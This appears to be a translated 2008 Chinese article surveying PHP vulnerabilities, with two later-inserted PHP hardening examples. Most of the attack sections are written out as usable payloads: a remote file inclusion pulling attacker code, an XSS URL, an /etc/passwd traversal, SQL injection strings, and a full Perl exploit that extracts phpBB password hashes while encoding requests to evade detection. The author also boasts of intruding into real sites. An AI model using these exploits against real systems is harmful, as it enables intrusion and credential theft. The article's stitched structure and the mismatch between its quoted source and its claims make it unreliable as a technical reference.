A Summary of PHP Website Vulnerabilities

2008-12-22 08:10:38  Source: Internet
This article is the pinyin-transliterated version of "A Summary of PHP Website Vulnerabilities" (PHP网站漏洞的相关总结), rendered here in English.
  Looking at network security today, the web page vulnerabilities that get the most attention and are encountered most often are probably the ASP ones; in that area Xiaozhu is the expert and I have no standing to speak. PHP, however, has equally serious security problems, yet there are few articles about them. So here I will discuss PHP page vulnerabilities with you a little.
  I have summarized the PHP vulnerabilities that are common at present; they fall roughly into the following kinds: file inclusion vulnerabilities, script command execution vulnerabilities, file disclosure vulnerabilities, SQL injection vulnerabilities, and a few others. Generic techniques such as cookie spoofing will of course not be discussed here; there is plenty of material on them online. So let us analyse, one by one, how these vulnerabilities are exploited!
  First, let us discuss the file inclusion vulnerability. This one should be said to be unique to PHP. It arises from insufficient handling of externally supplied malicious data, which lets a remote attacker use it to execute arbitrary commands on the system with the privileges of the web process. Let us look at an example. Suppose a.php contains this line of code:
  <?php
  include($include."/xxx.php");
  ?>
  In this code, $include is normally a path that has already been set, but we can construct a path of our own to achieve an attack. For example, we submit a.php?include=http://web/b.php, where web is the host we use for the attack and b.php is, of course, our attack code. In b.php we can write code such as passthru("/bin/ls /etc");. That way, some purposeful attack can be executed. (Note: that web server must not execute PHP code itself, otherwise it will not work. For details see "How to attack common vulnerabilities in PHP programs".) Many products have had problems in this area, for example: PayPal Store Front, HotNews, Mambo Open Source, PhpDig, YABB SE, phpBB, InvisionBoard, SOLMETRA SPAW Editor, Les Visiteurs, PhpGedView, X-Cart, and others.
  Next, let us look at the script command execution vulnerability. This is due to insufficient filtering of the URI parameters submitted by the user: submitting data that contains malicious HTML code can trigger a cross-site scripting attack and possibly obtain the target user's sensitive information. Here too we take an example: in PHP Transparent for PHP versions below 4.3.1, the index.php page does not adequately filter PHPSESSID, so we can achieve an attack with code like this:
  http://web/index.php?PHPSESSID="><script>...</script>
  Inside the script we can construct functions to obtain some of the user's sensitive information. There are relatively fewer problems in this area; besides PHP Transparent there are PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board, and others.
  Then let us look at the file disclosure vulnerability. This kind of vulnerability is due to insufficient filtering of user-submitted parameters; a remote attacker can use it to carry out directory traversal attacks and obtain sensitive information. Let us take the recently discovered phpMyAdmin case as an example. In phpMyAdmin, the export.php page does not adequately filter the user-submitted 'what' parameter; a remote attacker who submits data containing several '../' sequences can bypass the WEB ROOT restriction and view arbitrary files on the system with the web server's privileges. For instance, entering an address such as export.php?what=../../../../../../etc/passwd%00 achieves file disclosure. There are relatively more cases in this area, such as myPHPNuke, McNews, and others.
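A hardened counterpart to the two path-based cases above (the include($include."/xxx.php") pattern and the export.php 'what' traversal), added here as an example and not code from the original article or from any of the products it names; the function names, MODULE_DIR and the module allowlist are assumptions.

```php
<?php
// Added example, not code from the original article: hardening the two
// path-based cases discussed above, the include($include."/xxx.php")
// pattern and the export.php?what=../../etc/passwd%00 traversal.
// safe_include_path(), safe_file_under(), MODULE_DIR and the module
// names are assumptions made for this example.
declare(strict_types=1);

// The only directory this script may include from or export from.
const MODULE_DIR = __DIR__ . '/modules';

// Allowlist: the request selects a key, never a path. A remote URL such
// as http://web/b.php or a '../' sequence is simply not a key.
const MODULES = [
    'news'  => 'news.php',
    'forum' => 'forum.php',
];

// Map an untrusted request value to a file inside MODULE_DIR, or null.
function safe_include_path($untrusted): ?string
{
    if (!is_string($untrusted) || !array_key_exists($untrusted, MODULES)) {
        return null;
    }
    return MODULE_DIR . '/' . MODULES[$untrusted];
}

// For a page that genuinely must accept a file name (the 'what' case):
// strip directories, resolve symlinks, and insist the result is under $base.
function safe_file_under(string $base, string $untrusted): ?string
{
    // A NUL byte truncates the path at the C level, which is what the
    // trailing %00 in the traversal example relies on.
    if (strpos($untrusted, "\0") !== false) {
        return null;
    }
    $baseReal  = realpath($base);
    $candidate = realpath($base . '/' . basename($untrusted));
    if ($baseReal === false || $candidate === false) {
        return null; // base missing, or the file does not exist
    }
    // realpath() already collapsed '..'; the prefix check also catches a
    // symlink inside $base that points outside it.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Vulnerable form from the article (do not use):
//   include($include . "/xxx.php");   // $include comes straight from the request
// Hardened form:
$module = safe_include_path($_GET['include'] ?? '');
if ($module === null) {
    http_response_code(400);
    exit('unknown module');
}
include $module;
```

With register_globals off and allow_url_fopen = Off (the settings the article recommends later) the allowlist is still the primary control; the php.ini settings only reduce what a mistake can reach.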
  Finally, we come back to the most exciting part. Think how satisfying SQL injection in ASP pages usually is. We used to have to inject by hand, until Xiaozhu worked out the "SQL Injection Secrets" (heh heh); then, once NBSI had been built, our NB Alliance really opened up a whole new sky, finding vulnerabilities in turn at large sites such as CSDN, the Dafuweng forum and China Channel. (Enough of this chatter, I am drifting off topic...) Back to the point: SQL injection in ASP and SQL injection in PHP are roughly the same; you just need to pay a little attention to a few functions. Change asc to ASCII and len to LENGTH; the other functions basically stay the same. When you see PHP SQL injection, don't you all think of PHP-NUKE and PHPBB? Exactly. As the saying goes, a tall tree catches the wind: a forum like Dongwang in the ASP world must be the king of vulnerabilities, not because its security is so poor, but because its name is so well known; more people use it, so more people study it, and more security vulnerabilities are found. PHPBB is the same: nowadays a large share of people building forums in PHP choose PHPBB. Its vulnerabilities keep appearing too, from the earliest one found in phpBB.com phpBB 1.4.0, to the recent groupcp.php in phpBB 2.0.6, plus the previously found search.php, profile.php, viewtopic.php and so on, which together probably make a dozen or so. This has also led some people to use it as a specimen when studying PHP vulnerabilities; as they say, true gold is refined a hundred times, and I believe future PHPBB will get better and better.
  All right, let us still analyse why the vulnerability arises. Take the viewtopic.php page: when viewtopic.php is called, "topic_id" is taken directly from the GET request and passed to the SQL query without any filtering, so an attacker can submit a special SQL string to obtain the MD5 password; the password information obtained can be used for automatic login or for brute-force cracking. (I don't think anyone would want to brute-force it unless there is a particularly important reason.) First look at the relevant source code:
  if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
  {
      $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
  }
  else if ( isset($HTTP_GET_VARS['topic']) )
  {
      $topic_id = intval($HTTP_GET_VARS['topic']);
  }
  From the above we can see that if view=newest is submitted and sid has been given a value, the query code that is executed looks like the following (if you have not read the PHPBB source yet, I suggest you read it first and then come back to this; affected systems: phpBB 2.0.5 and phpBB 2.0.4).
  $sql = "select p.post_id
      FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
      where s.session_id = '$session_id'
      AND u.user_id = s.session_user_id
      AND p.topic_id = $topic_id
      AND p.post_time >= u.user_lastvisit
      ORDER BY p.post_time ASC
      LIMIT 1";
  Rick provided the following test code:
  use IO::Socket;
  $remote = shift || 'localhost';
  $view_topic = shift || '/phpBB2/viewtopic.php';
  $uid = shift || 2;
  $port = 80;
  $dbtype = 'mysql4'; # mysql4 or pgsql
  print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";
  $p = "";
  # one request per character of the 32-character MD5 hash
  for($index=1; $index<=32; $index++) {
      $socket = IO::Socket::INET->new(PeerAddr => $remote,
                                      PeerPort => $port,
                                      Proto => "tcp",
                                      Type => SOCK_STREAM)
          or die "Couldnt connect to $remote:$port :$@\n";
      $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\n\n";
      print $socket $str;
      print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
      print $socket "Host: $remote\n\n";
      while ($answer = <$socket>) {
          # Matches the location: viewtopic.php?p=<num>#<num>
          if ($answer =~ /location:.*\x23(\d+)/) {
              $p .= chr($1); # $1 is the character code returned in the redirect
          }
      }
      close($socket);
  }
  print "\nMD5 Hash for uid $uid is $p\n";
  # random encode str. helps avoid detection
  sub random_encode {
      $str = shift;
      $ret = "";
      for($i=0; $i<length($str); $i++) {
          $c = substr($str,$i,1);
          $j = rand length($str) * 1000;
          if (int($j) % 2 || $c eq ' ') {
              $ret .= "%" . sprintf("%x",ord($c));
          } else {
              $ret .= $c;
          }
      }
      return $ret;
  }
  sub make_dbsql {
      if ($dbtype eq 'mysql4') {
          return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
      } elsif ($dbtype eq 'pgsql') {
          return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
      } else {
          return "";
      }
  }
  I will not explain this code much; its purpose is to obtain the HASH value.
  Reading this far, you may wonder why the replacement functions I mentioned earlier have not been used. I will say it at the risk of being laughed at: on many sites online, the query statement of some pages actually looks like this:
  display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
  Don't laugh, this is true; I got into several large sites by relying on exactly this. As for which ones, it is not convenient to say, but I got into the back end of our school's website this way (I hope the school network centre doesn't see this article, ^_^). Use those functions from earlier, otherwise all you can do is change other people's passwords!!!
  I almost forgot one point: when doing SQL injection, PHP differs from ASP. MySQL is not as flexible with SQL statements as MSSQL, so many query statements that work on MSSQL do not work in a MySQL database. The injection statements we commonly see look like this: aaa.php?id=a' into outfile 'pass.txt or aaa.php?id=a' into outfile 'pass.txt' /* which can be taken a step further as: aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt
  This way database data can be exported to a file and then read.
  Or like this: mode=',user_level='4
  This statement is generally used when profile data is being modified; if the page is vulnerable, it achieves privilege escalation.
  Others such as ' OR 1=1 -- or 1' or 1='1 are about the same as in ASP and will not be discussed further here. In PHP, SQL injection still seems to be the leading vulnerability; far too many pages have this problem.
  In fact you can see that the categories above all come down to one cause: submitted parameters are not filtered, or not filtered strictly enough. Attack and defence have always gone together, so here I will roughly describe the prevention methods.
  First, in my personal view the most important point is to set magic_quotes_gpc to ON. Its effect is to convert single quotes, double quotes, backslashes and NUL characters into backslash-escaped characters. For instance, with the statement select * from admin where username='$username' and password='$password', an attacker who wants to skip authentication with 1' or 1='1 will find those strings converted into this: select * from admin where username='a' and password='1\' or 1=\'1', which blocks the injection; in effect it is just applying addslashes() automatically. If that is not available, define your own function to handle it. Seen today, the people doing PHP injection are fairly frustrated, because MySQL versions below 4 do not support subqueries, while newer versions of MySQL turn the magic_quotes_gpc option on by default.
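The login query from the magic_quotes_gpc discussion, rewritten with bound parameters, plus the phpBB-style topic_id query to show the unquoted integer case that quoting alone cannot protect. This is an added example, not code from the article or from phpBB; the $pdo connection, the admin table with a password_hash column and the phpbb_* table names are assumptions.

```php
<?php
// Added example, not code from the original article: the admin login
// query from the magic_quotes_gpc discussion rewritten with bound
// parameters, plus the phpBB-style topic_id lookup to show the case that
// quoting cannot cover. The $pdo connection, the admin table with a
// password_hash column, and the phpbb_* table names are assumptions.
declare(strict_types=1);

// Vulnerable forms from the article (do not use):
//   "select * from admin where username='$username' and password='$password'"
// magic_quotes_gpc / addslashes() turns 1' or 1='1 into 1\' or 1=\'1, which
// helps only because the value sits inside quotes. The numeric case
//   "... AND p.topic_id = $topic_id ..."
// has no quotes to escape, so topic_id=-1 union select ... goes through
// untouched. Bound parameters cover both: the input never becomes SQL text.

function find_admin(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password_hash FROM admin WHERE username = :u'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Compare the password in PHP against a stored hash, not inside the query.
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

function newest_post_id(PDO $pdo, string $sessionId, string $topicIdRaw): ?int
{
    // intval('-1 union select ...') would quietly return -1 and hide the
    // attempt, so require an all-digit value and reject everything else.
    if (!ctype_digit($topicIdRaw)) {
        return null;
    }
    $stmt = $pdo->prepare(
        'SELECT p.post_id
           FROM phpbb_posts p, phpbb_sessions s, phpbb_users u
          WHERE s.session_id = :sid
            AND u.user_id = s.session_user_id
            AND p.topic_id = :tid
            AND p.post_time >= u.user_lastvisit
          ORDER BY p.post_time ASC
          LIMIT 1'
    );
    $stmt->bindValue(':sid', $sessionId, PDO::PARAM_STR);
    $stmt->bindValue(':tid', (int) $topicIdRaw, PDO::PARAM_INT);
    $stmt->execute();
    $postId = $stmt->fetchColumn();
    return $postId === false ? null : (int) $postId;
}

// Usage (connection details assumed):
//   $pdo = new PDO('mysql:host=localhost;dbname=forum', $dbUser, $dbPass,
//                  [PDO::ATTR_EMULATE_PREPARES => false]);
// Turning emulation off makes the MySQL driver use real server-side
// prepared statements rather than client-side quoting.
```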
  The way to fix file inclusion vulnerabilities is this: programmers should avoid using variables in include file parameters as far as possible; if a variable is used, the name of the file to be included must be strictly checked and must never be freely specifiable by the user; it is suggested to set global_variables to off. As with file opening earlier, restricting the paths PHP may operate on is a necessary option. In addition, unless it is specifically needed, PHP's remote file opening feature must be turned off. Modify the php.ini file: allow_url_fopen = Off (Note: see "PHP security issues: remote overflow, DoS, safe_mode bypass vulnerabilities").